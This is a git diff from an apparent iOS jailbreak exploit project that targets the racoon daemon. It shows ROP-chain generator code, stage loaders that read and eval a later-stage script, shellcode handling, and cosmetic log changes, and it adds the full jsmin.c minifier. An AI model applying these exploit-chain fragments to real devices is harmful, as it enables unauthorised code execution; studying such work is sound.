diff options
| -rw-r--r-- | .gitignore | 4 | ||||
| -rwxr-xr-x | build_native.sh | 10 | ||||
| -rw-r--r-- | src/gen/stage2.c | 7 | ||||
| -rw-r--r-- | src/js/main.js | 23 | ||||
| -rw-r--r-- | src/js/primitives/mem.js | 2 | ||||
| -rw-r--r-- | src/stage4/main.js | 7 | ||||
| -rw-r--r-- | stage4.js | 7 | ||||
| -rwxr-xr-x | tools/build_native.sh | 6 | ||||
| -rw-r--r-- | tools/jsmin.c | 319 |
9 files changed, 363 insertions, 22 deletions
@@ -15,4 +15,6 @@ exp.js racoon.conf
-.vscode
\ No newline at end of file +.vscode
+
+exp_unmin.js
\ No newline at end of file diff --git a/build_native.sh b/build_native.sh index a2f2a3b..fee1a7b 100755 --- a/build_native.sh +++ b/build_native.sh @@ -1,9 +1,11 @@ #!/bin/bash -rm exp.js -find src/js -name '*.js' -exec cat {} \; >> exp.js -echo >> exp.js -echo "main();" >> exp.js +rm exp_unmin.js +find src/js -name '*.js' -exec cat {} \; >> exp_unmin.js +echo >> exp_unmin.js +echo "main();" >> exp_unmin.js + +cat exp_unmin.js | tools/bin/jsmin > exp.js rm stage4.js find src/stage4 -name '*.js' -exec cat {} \; >> stage4.js diff --git a/src/gen/stage2.c b/src/gen/stage2.c index 63dccc1..1b18d16 100644 --- a/src/gen/stage2.c +++ b/src/gen/stage2.c @@ -281,13 +281,14 @@ rop_chain_shit gen_rop_chain(uint32_t base, // CALL_4_ARG_L2_0(base + 0x9ad8c, LOG_SYSLOG, base + we_out_here_addr); - /* allocate memory for file read later */ +/* + /* allocate memory for file read later *\/ CALL_1ARG(base + malloc_addr, 0x100000); STR_R0(base + reserve_addr); MOV_R1_R0(); - /* output malloc string */ - CALL_1ARG(base + printf_addr, base + malloc_status_addr); + /* output malloc string *\/ + CALL_1ARG(base + printf_addr, base + malloc_status_addr);*/ /* calculate dyld_shared_cache slide */ MOV_R0(0 - (0x20000000 + scprefcreate_dsc_offset)); diff --git a/src/js/main.js b/src/js/main.js index 905c4ef..6c1c9a5 100644 --- a/src/js/main.js +++ b/src/js/main.js @@ -48,7 +48,8 @@ var kCFBooleanFalse; var kCFPreferencesAnyUser; var kCFPreferencesCurrentHost; var kIOMasterPortDefault = NULL; -var options = {}; +var p0laris = {}; +p0laris.options = {}; var sanity_port = 0; var MACH_PORT_RIGHT_RECEIVE = 0x1; @@ -97,11 +98,16 @@ function parse_nvram_options() { for (var i = 0; i < p0laris_options_buf.length; i++) { p0laris_options_js_str += String.fromCharCode(p0laris_options_buf[i]); } - options = JSON.parse(p0laris_options_js_str); + p0laris.options = JSON.parse(p0laris_options_js_str); } } } +function p0laris_object_general() { + p0laris.dyld_shc_slide = get_dyld_shc_slide(); + p0laris.racoon_slide = get_our_slide(); +} + function main() { /* * get slide and calculate slid base @@ -121,16 +127,16 @@ function main() { syslog(LOG_SYSLOG, "we out here"); syslog(LOG_SYSLOG, "stage3"); - puts("we out here"); - puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?"); - - var dyld_shc_slide = get_dyld_shc_slide(); + puts("[*] we out here"); + puts("[*] landed in stage3"); setup_fancy_rw(); parse_nvram_options(); + + p0laris_object_general(); - if (options["sleep_spin"] === true) { + if (p0laris.options.sleep_spin === true) { while (1) { sleep(3600); } @@ -138,6 +144,7 @@ function main() { var stage4_bin = malloc(0x400000); + printf("[*] loading stage4...\n"); var fd = open("/var/root/stage4.js", O_RDONLY, 0); var bytes_read = read(fd, stage4_bin, 0x400000); var stage4_bin_buf = read_buf(stage4_bin, bytes_read); @@ -146,7 +153,7 @@ function main() { stage4_js_str += String.fromCharCode(stage4_bin_buf[i]); } - printf("stage4 time baby\n"); + printf("[*] entering stage4...\n"); eval(stage4_js_str); exit(main()); diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js index d664e7b..f6a0f8b 100644 --- a/src/js/primitives/mem.js +++ b/src/js/primitives/mem.js @@ -226,7 +226,7 @@ function init_sptr_heap() { sptr_size = 0x1000000; sptr_len = 0; - calls4arg("printf\0", sptr("sptr_heap=%p\n"), global_sptr_addy, 0, 0); + calls4arg("printf\0", sptr("[*] sptr_heap=%p\n"), global_sptr_addy, 0, 0); return global_sptr_addy; } diff --git a/src/stage4/main.js b/src/stage4/main.js index 4947a77..328bb0a 100644 --- a/src/stage4/main.js +++ b/src/stage4/main.js @@ -1,6 +1,9 @@ function main() { - printf("landed in stage4\n"); - syslog(LOG_SYSLOG, "we out here in stage 4"); + printf("[*] landed in stage4\n"); + syslog(LOG_SYSLOG, "we out here"); + + printf("[*] p0laris.dyld_shc_slide=0x%08x\n", p0laris.dyld_shc_slide); + printf("[*] p0laris.racoon_slide=0x%08x\n", p0laris.racoon_slide); return 0; }
\ No newline at end of file @@ -1,6 +1,9 @@ function main() { - printf("landed in stage4\n"); - syslog(LOG_SYSLOG, "we out here in stage 4"); + printf("[*] landed in stage4\n"); + syslog(LOG_SYSLOG, "we out here"); + + printf("[*] p0laris.dyld_shc_slide=0x%08x\n", p0laris.dyld_shc_slide); + printf("[*] p0laris.racoon_slide=0x%08x\n", p0laris.racoon_slide); return 0; }
\ No newline at end of file diff --git a/tools/build_native.sh b/tools/build_native.sh index 2290017..6957f43 100755 --- a/tools/build_native.sh +++ b/tools/build_native.sh @@ -31,4 +31,8 @@ chmod 777 /etc/racoon/shellcode.bin rm bin/jit_all_the_things gcc jit_all_the_things.c -o bin/jit_all_the_things --std=c99 -marm -fPIC -ldid -Sent.xml bin/jit_all_the_things
\ No newline at end of file +ldid -Sent.xml bin/jit_all_the_things + +rm bin/jsmin +gcc jsmin.c -o bin/jsmin --std=c99 +ldid -S bin/jsmin
\ No newline at end of file diff --git a/tools/jsmin.c b/tools/jsmin.c new file mode 100644 index 0000000..1582450 --- /dev/null +++ b/tools/jsmin.c @@ -0,0 +1,319 @@ +/* jsmin.c + 2019-10-30 + +Copyright (C) 2002 Douglas Crockford (www.crockford.com) + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies +of the Software, and to permit persons to whom the Software is furnished to do +so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +The Software shall be used for Good, not Evil. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. +*/ + +#include <stdlib.h> +#include <stdio.h> + +static int the_a; +static int the_b; +static int look_ahead = EOF; +static int the_x = EOF; +static int the_y = EOF; + + +static void error(char* string) { + fputs("JSMIN Error: ", stderr); + fputs(string, stderr); + fputc('\n', stderr); + exit(1); +} + +/* is_alphanum -- return true if the character is a letter, digit, underscore, + dollar sign, or non-ASCII character. +*/ + +static int is_alphanum(int codeunit) { + return ( + (codeunit >= 'a' && codeunit <= 'z') + || (codeunit >= '0' && codeunit <= '9') + || (codeunit >= 'A' && codeunit <= 'Z') + || codeunit == '_' + || codeunit == '$' + || codeunit == '\\' + || codeunit > 126 + ); +} + + +/* get -- return the next character from stdin. Watch out for lookahead. If + the character is a control character, translate it to a space or + linefeed. +*/ + +static int get() { + int codeunit = look_ahead; + look_ahead = EOF; + if (codeunit == EOF) { + codeunit = getc(stdin); + } + if (codeunit >= ' ' || codeunit == '\n' || codeunit == EOF) { + return codeunit; + } + if (codeunit == '\r') { + return '\n'; + } + return ' '; +} + + +/* peek -- get the next character without advancing. +*/ + +static int peek() { + look_ahead = get(); + return look_ahead; +} + + +/* next -- get the next character, excluding comments. peek() is used to see + if a '/' is followed by a '/' or '*'. +*/ + +static int next() { + int codeunit = get(); + if (codeunit == '/') { + switch (peek()) { + case '/': + for (;;) { + codeunit = get(); + if (codeunit <= '\n') { + break; + } + } + break; + case '*': + get(); + while (codeunit != ' ') { + switch (get()) { + case '*': + if (peek() == '/') { + get(); + codeunit = ' '; + } + break; + case EOF: + error("Unterminated comment."); + } + } + break; + } + } + the_y = the_x; + the_x = codeunit; + return codeunit; +} + + +/* action -- do something! What you do is determined by the argument: + 1 Output A. Copy B to A. Get the next B. + 2 Copy B to A. Get the next B. (Delete A). + 3 Get the next B. (Delete B). + action treats a string as a single character. + action recognizes a regular expression if it is preceded by the likes of + '(' or ',' or '='. +*/ + +static void action(int determined) { + switch (determined) { + case 1: + putc(the_a, stdout); + if ( + (the_y == '\n' || the_y == ' ') + && (the_a == '+' || the_a == '-' || the_a == '*' || the_a == '/') + && (the_b == '+' || the_b == '-' || the_b == '*' || the_b == '/') + ) { + putc(the_y, stdout); + } + case 2: + the_a = the_b; + if (the_a == '\'' || the_a == '"' || the_a == '`') { + for (;;) { + putc(the_a, stdout); + the_a = get(); + if (the_a == the_b) { + break; + } + if (the_a == '\\') { + putc(the_a, stdout); + the_a = get(); + } + if (the_a == EOF) { + error("Unterminated string literal."); + } + } + } + case 3: + the_b = next(); + if (the_b == '/' && ( + the_a == '(' || the_a == ',' || the_a == '=' || the_a == ':' + || the_a == '[' || the_a == '!' || the_a == '&' || the_a == '|' + || the_a == '?' || the_a == '+' || the_a == '-' || the_a == '~' + || the_a == '*' || the_a == '/' || the_a == '{' || the_a == '}' + || the_a == ';' + )) { + putc(the_a, stdout); + if (the_a == '/' || the_a == '*') { + putc(' ', stdout); + } + putc(the_b, stdout); + for (;;) { + the_a = get(); + if (the_a == '[') { + for (;;) { + putc(the_a, stdout); + the_a = get(); + if (the_a == ']') { + break; + } + if (the_a == '\\') { + putc(the_a, stdout); + the_a = get(); + } + if (the_a == EOF) { + error( + "Unterminated set in Regular Expression literal." + ); + } + } + } else if (the_a == '/') { + switch (peek()) { + case '/': + case '*': + error( + "Unterminated set in Regular Expression literal." + ); + } + break; + } else if (the_a =='\\') { + putc(the_a, stdout); + the_a = get(); + } + if (the_a == EOF) { + error("Unterminated Regular Expression literal."); + } + putc(the_a, stdout); + } + the_b = next(); + } + } +} + + +/* jsmin -- Copy the input to the output, deleting the characters which are + insignificant to JavaScript. Comments will be removed. Tabs will be + replaced with spaces. Carriage returns will be replaced with linefeeds. + Most spaces and linefeeds will be removed. +*/ + +static void jsmin() { + if (peek() == 0xEF) { + get(); + get(); + get(); + } + the_a = '\n'; + action(3); + while (the_a != EOF) { + switch (the_a) { + case ' ': + action( + is_alphanum(the_b) + ? 1 + : 2 + ); + break; + case '\n': + switch (the_b) { + case '{': + case '[': + case '(': + case '+': + case '-': + case '!': + case '~': + action(1); + break; + case ' ': + action(3); + break; + default: + action( + is_alphanum(the_b) + ? 1 + : 2 + ); + } + break; + default: + switch (the_b) { + case ' ': + action( + is_alphanum(the_a) + ? 1 + : 3 + ); + break; + case '\n': + switch (the_a) { + case '}': + case ']': + case ')': + case '+': + case '-': + case '"': + case '\'': + case '`': + action(1); + break; + default: + action( + is_alphanum(the_a) + ? 1 + : 3 + ); + } + break; + default: + action(1); + break; + } + } + } +} + + +/* main -- Output any command line arguments as comments + and then minify the input. +*/ + +extern int main(int argc, char* argv[]) { + int i; + for (i = 1; i < argc; i += 1) { + fprintf(stdout, "// %s\n", argv[i]); + } + jsmin(); + return 0; +}
\ No newline at end of file |